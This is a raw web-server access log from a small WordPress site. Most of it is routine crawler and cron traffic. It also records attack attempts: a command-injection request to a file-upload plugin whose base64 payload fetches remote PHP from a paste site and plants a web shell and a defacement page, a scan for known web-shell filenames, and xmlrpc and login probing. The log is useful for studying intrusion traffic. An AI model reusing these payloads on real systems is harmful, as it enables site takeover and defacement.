198.54.114.83 - - [30/Mar/2025:21:17:32 -0400] "POST /wp-cron.php?doing_wp_cron=1743383849.0449171066284179687500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
205.210.31.51 - - [30/Mar/2025:21:17:46 -0400] "GET / HTTP/1.1" 200 16759 "-" "-"
196.251.69.226 - - [30/Mar/2025:21:17:50 -0400] "GET /thoms.php HTTP/1.1" 403 7160 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
84.247.50.194 - - [30/Mar/2025:21:33:13 -0400] "GET /cbd-uk-what-is-it/ HTTP/1.1" 200 17108 "http://the80itspod.com/cbd-uk-what-is-it/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
84.247.50.194 - - [30/Mar/2025:21:33:13 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://the80itspod.com/cbd-uk-what-is-it/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
212.8.248.108 - - [30/Mar/2025:22:33:30 -0400] "GET /marvel-comic-characters-at-casinos/ HTTP/1.1" 200 14647 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
45.84.107.76 - - [30/Mar/2025:23:19:54 -0400] "GET / HTTP/1.1" 200 16759 "the80itspod.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 YaBrowser/15.10.2454.3660 Safari/537.36"
216.244.66.235 - - [31/Mar/2025:00:31:20 -0400] "GET /robots.txt HTTP/1.1" 200 126 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
43.133.62.111 - - [31/Mar/2025:00:33:44 -0400] "GET / HTTP/1.1" 200 16759 "https://google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
216.244.66.235 - - [31/Mar/2025:00:35:36 -0400] "GET /2025/03/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
37.27.132.172 - - [31/Mar/2025:02:31:40 -0400] "GET /relx-electronic-cigarette/ HTTP/1.1" 200 14981 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
124.156.179.141 - - [31/Mar/2025:02:51:23 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.208.98.23 - - [31/Mar/2025:02:56:31 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
91.201.113.132 - - [31/Mar/2025:03:10:52 -0400] "GET /relx-electronic-cigarette/ HTTP/1.1" 200 14981 "http://the80itspod.com/relx-electronic-cigarette/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
91.201.113.132 - - [31/Mar/2025:03:10:59 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://the80itspod.com/relx-electronic-cigarette/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
37.139.53.144 - - [31/Mar/2025:03:15:05 -0400] "GET /marvel-comic-characters-at-casinos/ HTTP/1.1" 200 14647 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
136.243.228.178 - - [31/Mar/2025:03:29:51 -0400] "GET /robots.txt HTTP/1.1" 200 126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
121.40.58.137 - - [31/Mar/2025:03:33:14 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
94.103.90.150 - - [31/Mar/2025:05:19:56 -0400] "GET /relx-electronic-cigarette/ HTTP/1.1" 200 14981 "http://the80itspod.com/relx-electronic-cigarette/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
94.103.90.150 - - [31/Mar/2025:05:19:56 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://the80itspod.com/relx-electronic-cigarette/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:05:25:02 -0400] "POST /wp-cron.php?doing_wp_cron=1743413102.4279310703277587890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
45.236.1.57 - - [31/Mar/2025:05:24:58 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
198.54.114.83 - - [31/Mar/2025:05:25:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743413105.4391639232635498046875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
185.225.31.24 - - [31/Mar/2025:05:25:05 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
192.227.205.118 - - [31/Mar/2025:05:46:58 -0400] "GET /relx-electronic-cigarette/ HTTP/1.1" 200 14981 "http://the80itspod.com/relx-electronic-cigarette/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
85.208.98.23 - - [31/Mar/2025:05:53:59 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
223.15.245.170 - - [31/Mar/2025:06:06:47 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.148.206.226 - - [31/Mar/2025:06:29:55 -0400] "GET /cbd-uk-what-is-it/ HTTP/1.1" 200 17108 "http://the80itspod.com/cbd-uk-what-is-it/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
101.32.244.173 - - [31/Mar/2025:06:43:37 -0400] "GET / HTTP/1.1" 200 16759 "https://google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
196.251.88.242 - - [31/Mar/2025:07:15:26 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [31/Mar/2025:07:15:36 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [31/Mar/2025:07:15:44 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
170.106.180.153 - - [31/Mar/2025:08:04:42 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
37.27.130.10 - - [31/Mar/2025:08:48:07 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
185.7.214.130 - - [31/Mar/2025:08:49:23 -0400] "GET / HTTP/1.1" 200 16759 "http://the80itspod.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:08:52:28 -0400] "POST /wp-cron.php?doing_wp_cron=1743425548.7191760540008544921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
103.30.10.71 - - [31/Mar/2025:08:52:28 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:08:52:34 -0400] "POST /wp-cron.php?doing_wp_cron=1743425553.9058830738067626953125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
179.49.203.29 - - [31/Mar/2025:08:52:33 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:92.0) Gecko/20100101 Firefox/92.0"
198.54.114.83 - - [31/Mar/2025:09:02:11 -0400] "POST /wp-cron.php?doing_wp_cron=1743426131.1335649490356445312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
104.207.45.187 - - [31/Mar/2025:09:02:08 -0400] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
104.207.45.187 - - [31/Mar/2025:09:02:14 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
104.207.45.187 - - [31/Mar/2025:09:02:15 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.244.66.235 - - [31/Mar/2025:09:10:43 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [31/Mar/2025:09:15:04 -0400] "POST /wp-cron.php?doing_wp_cron=1743426904.9154400825500488281250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
216.244.66.235 - - [31/Mar/2025:09:15:01 -0400] "GET /elevate-the-look-of-your-defender-with-a-defender-hard-tire-cover/ HTTP/1.1" 200 15461 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
85.208.98.23 - - [31/Mar/2025:09:49:07 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
192.0.112.242 - - [31/Mar/2025:10:03:44 -0400] "GET /advantages-of-factory-automation/ HTTP/1.1" 200 14643 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.2 HTTP/1.1" 200 19532 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/assets/icons/style.css?ver=6.7.2 HTTP/1.1" 200 1353 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/newsback/style.css?ver=1.0.2 HTTP/1.1" 200 2440 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/assets/bootstrap/css/bootstrap.min.css?ver=6.7.2 HTTP/1.1" 200 25140 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 35438 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/style.css?ver=6.7.2 HTTP/1.1" 200 48609 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/js/skip-link-focus-fix.js?ver=1.0.2 HTTP/1.1" 200 426 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 5342 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/js/navigation.js?ver=1.0.2 HTTP/1.1" 200 1179 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/assets/fixed-header-script.js?ver=1.0.2 HTTP/1.1" 200 868 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/assets/jquery-match-height/jquery.matchHeight.min.js?ver=1.0.2 HTTP/1.1" 200 1470 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/assets/script.js?ver=1.0.2 HTTP/1.1" 200 3529 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-includes/js/comment-reply.min.js?ver=6.7.2 HTTP/1.1" 200 1422 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/newsback/assets/img/default-header-image.jpeg HTTP/1.1" 200 297284 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-content/themes/covernews/assets/icons/fonts/aft-icons.ttf?kiv2u2 HTTP/1.1" 200 19272 "http://the80itspod.com/wp-content/themes/covernews/assets/icons/style.css?ver=6.7.2" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
192.0.112.242 - - [31/Mar/2025:10:03:45 -0400] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.2 HTTP/1.1" 200 5857 "http://the80itspod.com/advantages-of-factory-automation/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.6834.110 Safari/537.36 WP.com mShots"
104.131.166.33 - - [31/Mar/2025:10:36:08 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
176.67.83.246 - - [31/Mar/2025:10:41:56 -0400] "GET /cbd-uk-what-is-it/ HTTP/1.1" 200 17108 "http://the80itspod.com/cbd-uk-what-is-it/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
176.67.83.246 - - [31/Mar/2025:10:41:57 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://the80itspod.com/cbd-uk-what-is-it/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:10:56:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743432978.9023039340972900390625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
206.189.39.21 - - [31/Mar/2025:10:56:12 -0400] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:23 -0400] "GET /simple.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:26 -0400] "GET /cong.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:27 -0400] "GET /xxx.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:33 -0400] "GET /tmpls.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:37 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:43 -0400] "GET /chosen.php?p= HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:44 -0400] "GET /chosen.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:51 -0400] "GET /wp-cron.php?ac=3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:56:53 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:01 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:04 -0400] "GET /wp-includes/Text/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:05 -0400] "GET /wp-includes/Text/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:07 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:09 -0400] "GET /Njima.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:13 -0400] "GET /wp-admin/images/Mhbgf.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:16 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:16 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
198.54.114.83 - - [31/Mar/2025:10:57:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743433040.2391889095306396484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
206.189.39.21 - - [31/Mar/2025:10:57:20 -0400] "GET /wp-admin/css/ysirlifn.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:22 -0400] "GET /repeater.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:24 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:28 -0400] "GET /ioxi002.PhP7 HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:31 -0400] "GET /radio.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:35 -0400] "GET /radio.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:38 -0400] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:38 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:39 -0400] "GET /ofso64.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:46 -0400] "GET /wp-content/plugins/TOPXHOH/wDR.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:49 -0400] "GET /wp-content/plugins/IOptimize.php?rchk HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:53 -0400] "GET /wp-content/themes/ccx/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:53 -0400] "GET /wp-content/themes/ccx/ HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:57:58 -0400] "GET /wp-content/uploads/2017-------/09/wp-console.php HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
